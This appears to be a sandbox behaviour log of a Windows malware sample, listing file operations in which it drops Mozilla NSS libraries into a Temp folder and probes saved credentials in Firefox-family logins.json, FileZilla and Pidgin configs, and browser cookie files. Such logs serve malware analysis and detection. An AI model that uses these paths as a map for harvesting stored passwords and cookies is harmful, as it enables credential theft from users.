Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-1.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-profile-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-rtlsupport-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-string-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-2-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-sysinfo-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-timezone-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-util-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-conio-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-convert-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-environment-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-filesystem-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-heap-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-locale-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-math-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-multibyte-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-private-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-process-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-runtime-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-stdio-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-string-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-time-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-utility-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/freebl3.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/mozglue.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/msvcp140.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nss3.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nssdbm3.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/softokn3.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/ucrtbase.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/vcruntime140.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\filezilla\recentservers.xml desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\filezilla\recentservers.xml desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[3].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[4].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 2
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 2
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 2
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 2
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 2
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 2
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 2
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 2
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 2
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 2
Create C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create Directory C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\ - True 1
Get Info STD_ERROR_HANDLE type = size, size_out = 8383776169708 False 249
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\nss3.dll type = file_attributes True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\.\logins.json type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\..\logins.json type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\logins.json type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Thunderbird\Profiles\\logins.json type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Waterfox\Profiles\\logins.json type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Comodo\IceDragon\Profiles\\logins.json type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\8pecxstudios\Cyberfox\Profiles\\logins.json type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Moonchild Productions\Pale Moon\Profiles\\logins.json type = file_attributes False 1
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp type = file_attributes True 1
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp-journal type = file_attributes False 2
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp-wal type = file_attributes False 2
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\filezilla\recentservers.xml type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml type = file_attributes False 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt type = size, size_out = 0 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt type = size, size_out = 0 True 1
